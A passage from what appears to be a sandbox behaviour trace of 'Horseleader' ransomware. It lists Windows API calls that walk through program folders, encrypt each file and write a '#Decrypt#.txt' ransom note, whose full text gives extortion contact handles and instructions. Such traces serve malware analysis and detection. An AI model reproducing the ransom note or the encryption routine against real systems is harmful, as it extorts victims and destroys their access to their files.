lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0251.504] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6fe64ba3, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x6fe64ba3, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x4d03f8a5, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x135b, dwReserved0=0x7e1110, dwReserved1=0xfbc691b5, cFileName="NavigationUp_ButtonGraphic.png", cAlternateFileName="")) returned 1 [0251.504] lstrcmpiW (lpString1="NavigationUp_ButtonGraphic.png", lpString2="Windows") returned -1 [0251.504] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\FlipPage\\NavigationUp_ButtonGraphic.png") returned 87 [0251.504] StrStrIW (lpFirst="NavigationUp_ButtonGraphic.png", lpSrch=".horseleader") returned 0x0 [0251.504] lstrcmpW (lpString1="NavigationUp_ButtonGraphic.png", lpString2="#Decrypt#.txt") returned 1 [0251.504] lstrcmpW (lpString1="NavigationUp_ButtonGraphic.png", lpString2="_uninstalling_.png") returned 1 [0251.504] lstrlenW (lpString=".testttjffg") returned 11 [0251.504] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\FlipPage\\NavigationUp_ButtonGraphic.png", lpSrch=".testttjffg") returned 0x0 [0251.504] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0251.504] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0251.504] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\FlipPage\\NavigationUp_ButtonGraphic.png" (normalized: "c:\\program files\\dvd 
maker\\shared\\dvdstyles\\flippage\\navigationup_buttongraphic.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0251.505] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6fe8ad00, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x6fe8ad00, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x4d03f8a5, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0xc09, dwReserved0=0x7e1110, dwReserved1=0xfbc691b5, cFileName="NavigationUp_SelectionSubpicture.png", cAlternateFileName="")) returned 1 [0251.505] lstrcmpiW (lpString1="NavigationUp_SelectionSubpicture.png", lpString2="Windows") returned -1 [0251.505] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\FlipPage\\NavigationUp_SelectionSubpicture.png") returned 93 [0251.505] StrStrIW (lpFirst="NavigationUp_SelectionSubpicture.png", lpSrch=".horseleader") returned 0x0 [0251.505] lstrcmpW (lpString1="NavigationUp_SelectionSubpicture.png", lpString2="#Decrypt#.txt") returned 1 [0251.505] lstrcmpW (lpString1="NavigationUp_SelectionSubpicture.png", lpString2="_uninstalling_.png") returned 1 [0251.505] lstrlenW (lpString=".testttjffg") returned 11 [0251.505] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\FlipPage\\NavigationUp_SelectionSubpicture.png", lpSrch=".testttjffg") returned 0x0 [0251.506] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0251.506] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0251.506] CreateFileW 
(lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\FlipPage\\NavigationUp_SelectionSubpicture.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\flippage\\navigationup_selectionsubpicture.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0251.507] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6fdf278c, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x6fdf278c, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x4d03f8a5, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x5fc8, dwReserved0=0x7e1110, dwReserved1=0xfbc691b5, cFileName="pagecurl.png", cAlternateFileName="")) returned 1 [0251.507] lstrcmpiW (lpString1="pagecurl.png", lpString2="Windows") returned -1 [0251.507] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\FlipPage\\pagecurl.png") returned 69 [0251.507] StrStrIW (lpFirst="pagecurl.png", lpSrch=".horseleader") returned 0x0 [0251.507] lstrcmpW (lpString1="pagecurl.png", lpString2="#Decrypt#.txt") returned 1 [0251.507] lstrcmpW (lpString1="pagecurl.png", lpString2="_uninstalling_.png") returned 1 [0251.507] lstrlenW (lpString=".testttjffg") returned 11 [0251.507] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\FlipPage\\pagecurl.png", lpSrch=".testttjffg") returned 0x0 [0251.507] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0251.507] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0251.507] CreateFileW 
(lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\FlipPage\\pagecurl.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\flippage\\pagecurl.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0251.507] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6fdf278c, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x6fdf278c, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x4d03f8a5, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x5fc8, dwReserved0=0x7e1110, dwReserved1=0xfbc691b5, cFileName="pagecurl.png", cAlternateFileName="")) returned 0 [0251.507] FindClose (in: hFindFile=0x7c6760 | out: hFindFile=0x7c6760) returned 1 [0251.508] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\FlipPage\\#Decrypt#.txt") returned 70 [0251.508] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\FlipPage\\#Decrypt#.txt" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\flippage\\#decrypt#.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0251.510] lstrlenA (lpString="All your files have been ENCRYPTED!!!\r\nWrite to our ICQ @Horseleader\r\nOr contact us via jabber - horseleader@xmpp.jp\r\nJabber client installation instructions:\r\nDownload the jabber (Pidgin) client from https://pidgin.im/download/windows/ \r\n\r\nAfter installation, the Pidgin client will prompt you to create a new account. 
\r\nClick - Add\r\nIn the -Protocol field, select XMPP \r\nIn -Username - come up with any name \r\nIn the field -domain - enter any jabber-server, there are a lot of them, for example - exploit.im \r\nCreate a password\r\nAt the bottom, put a tick -Create account \r\nClick add \r\nIf you selected -domain - exploit.im, then a new window should appear in which you will need to re-enter your data: \r\nUser \r\npassword \r\nYou will need to follow the link to the captcha (there you will see the characters that you need to enter in the field below) \r\nIf you don't understand our Pidgin client installation instructions, you can find many installation tutorials on youtube - https://www.youtube.com/results?search_query=pidgin+jabber+install \r\nIf you have not received a response from us then we may have technical problems and please write to us using Jaber here bigbosshorse@xmpp.jp or on icq \r\nAttention!\r\nDo not rename encrypted files. \r\nDo not try to decrypt your data using third party software, it may cause permanent data loss. \r\nDecryption of your files with the help of third parties may cause increased price (they add their fee to our) or you can become a victim of a scam. 
\r\ntell your unique ID\r\n") returned 1508 [0251.510] WriteFile (in: hFile=0x158, lpBuffer=0xb41ca0*, nNumberOfBytesToWrite=0x5e4, lpNumberOfBytesWritten=0x32aeb98, lpOverlapped=0x0 | out: lpBuffer=0xb41ca0*, lpNumberOfBytesWritten=0x32aeb98*=0x5e4, lpOverlapped=0x0) returned 1 [0251.511] lstrlenA (lpString="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") returned 1368 [0251.511] WriteFile (in: hFile=0x158, lpBuffer=0x7d1740*, nNumberOfBytesToWrite=0x558, lpNumberOfBytesWritten=0x32aeb98, lpOverlapped=0x0 | out: lpBuffer=0x7d1740*, lpNumberOfBytesWritten=0x32aeb98*=0x558, lpOverlapped=0x0) returned 1 [0251.511] CloseHandle (hObject=0x158) returned 1 [0251.511] GetProcessHeap () returned 0x780000 [0251.512] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7dc820 | out: hHeap=0x780000) returned 1 [0251.512] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xa1a3fc59, ftCreationTime.dwHighDateTime=0x1cbf8eb, ftLastAccessTime.dwLowDateTime=0xaa63097e, ftLastAccessTime.dwHighDateTime=0x1cbf8eb, ftLastWriteTime.dwLowDateTime=0xa1a65ec8, ftLastWriteTime.dwHighDateTime=0x1cbf8eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName="Full", cAlternateFileName="")) returned 1 [0251.512] lstrcmpiW (lpString1="Full", lpString2="Windows") returned -1 [0251.512] wnsprintfW (in: pszDest=0x79b628, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Full") returned 52 [0251.512] lstrcmpW (lpString1="Full", lpString2=".") returned 1 [0251.512] lstrcmpW (lpString1="Full", lpString2="..") returned 1 [0251.512] lstrcmpW (lpString1="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Full", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned -1 [0251.512] GetProcessHeap () returned 0x780000 [0251.512] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 
0x7dc820 [0251.512] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Full\\*") returned 54 [0251.512] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Full\\*", lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xa1a3fc59, ftCreationTime.dwHighDateTime=0x1cbf8eb, ftLastAccessTime.dwLowDateTime=0xaa63097e, ftLastAccessTime.dwHighDateTime=0x1cbf8eb, ftLastWriteTime.dwLowDateTime=0xa1a65ec8, ftLastWriteTime.dwHighDateTime=0x1cbf8eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x7e1110, dwReserved1=0xfbc691b5, cFileName=".", cAlternateFileName="")) returned 0x7c6760 [0251.515] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0251.515] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Full\\.") returned 54 [0251.515] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0251.515] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xa1a3fc59, ftCreationTime.dwHighDateTime=0x1cbf8eb, ftLastAccessTime.dwLowDateTime=0xaa63097e, ftLastAccessTime.dwHighDateTime=0x1cbf8eb, ftLastWriteTime.dwLowDateTime=0xa1a65ec8, ftLastWriteTime.dwHighDateTime=0x1cbf8eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x7e1110, dwReserved1=0xfbc691b5, cFileName="..", cAlternateFileName="")) returned 1 [0251.515] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0251.515] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Full\\..") returned 55 [0251.516] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0251.516] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0251.516] FindNextFileW (in: hFindFile=0x7c6760, 
lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6f12724e, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x6f12724e, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x4d03f8a5, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x11da, dwReserved0=0x7e1110, dwReserved1=0xfbc691b5, cFileName="1047x576black.png", cAlternateFileName="")) returned 1 [0251.516] lstrcmpiW (lpString1="1047x576black.png", lpString2="Windows") returned -1 [0251.516] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Full\\1047x576black.png") returned 70 [0251.516] StrStrIW (lpFirst="1047x576black.png", lpSrch=".horseleader") returned 0x0 [0251.516] lstrcmpW (lpString1="1047x576black.png", lpString2="#Decrypt#.txt") returned 1 [0251.516] lstrcmpW (lpString1="1047x576black.png", lpString2="_uninstalling_.png") returned 1 [0251.516] lstrlenW (lpString=".testttjffg") returned 11 [0251.516] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Full\\1047x576black.png", lpSrch=".testttjffg") returned 0x0 [0251.516] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0251.516] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0251.516] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Full\\1047x576black.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\full\\1047x576black.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0251.517] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | 
out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6f173508, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x6f173508, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x4d03f8a5, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0xb05, dwReserved0=0x7e1110, dwReserved1=0xfbc691b5, cFileName="15x15dot.png", cAlternateFileName="")) returned 1 [0251.517] lstrcmpiW (lpString1="15x15dot.png", lpString2="Windows") returned -1 [0251.517] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Full\\15x15dot.png") returned 65 [0251.517] StrStrIW (lpFirst="15x15dot.png", lpSrch=".horseleader") returned 0x0 [0251.517] lstrcmpW (lpString1="15x15dot.png", lpString2="#Decrypt#.txt") returned 1 [0251.517] lstrcmpW (lpString1="15x15dot.png", lpString2="_uninstalling_.png") returned 1 [0251.517] lstrlenW (lpString=".testttjffg") returned 11 [0251.517] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Full\\15x15dot.png", lpSrch=".testttjffg") returned 0x0 [0251.517] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0251.518] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0251.518] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Full\\15x15dot.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\full\\15x15dot.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0251.518] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, 
ftCreationTime.dwLowDateTime=0x6f20ba7c, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x6f20ba7c, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x4d065a03, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x11d3, dwReserved0=0x7e1110, dwReserved1=0xfbc691b5, cFileName="dotsdarkoverlay.png", cAlternateFileName="")) returned 1 [0251.519] lstrcmpiW (lpString1="dotsdarkoverlay.png", lpString2="Windows") returned -1 [0251.519] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Full\\dotsdarkoverlay.png") returned 72 [0251.519] StrStrIW (lpFirst="dotsdarkoverlay.png", lpSrch=".horseleader") returned 0x0 [0251.519] lstrcmpW (lpString1="dotsdarkoverlay.png", lpString2="#Decrypt#.txt") returned 1 [0251.519] lstrcmpW (lpString1="dotsdarkoverlay.png", lpString2="_uninstalling_.png") returned 1 [0251.519] lstrlenW (lpString=".testttjffg") returned 11 [0251.519] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Full\\dotsdarkoverlay.png", lpSrch=".testttjffg") returned 0x0 [0251.519] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0251.519] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0251.519] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Full\\dotsdarkoverlay.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\full\\dotsdarkoverlay.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0251.523] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, 
ftCreationTime.dwLowDateTime=0x6f20ba7c, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x6f20ba7c, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x4d065a03, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x123d, dwReserved0=0x7e1110, dwReserved1=0xfbc691b5, cFileName="dotslightoverlay.png", cAlternateFileName="")) returned 1 [0251.523] lstrcmpiW (lpString1="dotslightoverlay.png", lpString2="Windows") returned -1 [0251.523] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Full\\dotslightoverlay.png") returned 73 [0251.523] StrStrIW (lpFirst="dotslightoverlay.png", lpSrch=".horseleader") returned 0x0 [0251.523] lstrcmpW (lpString1="dotslightoverlay.png", lpString2="#Decrypt#.txt") returned 1 [0251.524] lstrcmpW (lpString1="dotslightoverlay.png", lpString2="_uninstalling_.png") returned 1 [0251.524] lstrlenW (lpString=".testttjffg") returned 11 [0251.524] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Full\\dotslightoverlay.png", lpSrch=".testttjffg") returned 0x0 [0251.524] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0251.524] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0251.524] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Full\\dotslightoverlay.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\full\\dotslightoverlay.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0251.524] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, 
ftCreationTime.dwLowDateTime=0x6f12724e, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x6f12724e, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x4d065a03, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x6794, dwReserved0=0x7e1110, dwReserved1=0xfbc691b5, cFileName="full.png", cAlternateFileName="")) returned 1 [0251.524] lstrcmpiW (lpString1="full.png", lpString2="Windows") returned -1 [0251.524] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Full\\full.png") returned 61 [0251.524] StrStrIW (lpFirst="full.png", lpSrch=".horseleader") returned 0x0 [0251.524] lstrcmpW (lpString1="full.png", lpString2="#Decrypt#.txt") returned 1 [0251.524] lstrcmpW (lpString1="full.png", lpString2="_uninstalling_.png") returned 1 [0251.524] lstrlenW (lpString=".testttjffg") returned 11 [0251.524] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Full\\full.png", lpSrch=".testttjffg") returned 0x0 [0251.524] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0251.525] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0251.525] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Full\\full.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\full\\full.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0251.525] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6f1bf7c2, ftCreationTime.dwHighDateTime=0x1ca03fb, 
ftLastAccessTime.dwLowDateTime=0x6f1bf7c2, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x4d065a03, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x13e0, dwReserved0=0x7e1110, dwReserved1=0xfbc691b5, cFileName="NavigationLeft_ButtonGraphic.png", cAlternateFileName="")) returned 1 [0251.526] lstrcmpiW (lpString1="NavigationLeft_ButtonGraphic.png", lpString2="Windows") returned -1 [0251.526] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Full\\NavigationLeft_ButtonGraphic.png") returned 85 [0251.526] StrStrIW (lpFirst="NavigationLeft_ButtonGraphic.png", lpSrch=".horseleader") returned 0x0 [0251.526] lstrcmpW (lpString1="NavigationLeft_ButtonGraphic.png", lpString2="#Decrypt#.txt") returned 1 [0251.526] lstrcmpW (lpString1="NavigationLeft_ButtonGraphic.png", lpString2="_uninstalling_.png") returned 1 [0251.526] lstrlenW (lpString=".testttjffg") returned 11 [0251.526] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Full\\NavigationLeft_ButtonGraphic.png", lpSrch=".testttjffg") returned 0x0 [0251.526] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0251.526] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0251.526] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Full\\NavigationLeft_ButtonGraphic.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\full\\navigationleft_buttongraphic.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0251.527] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: 
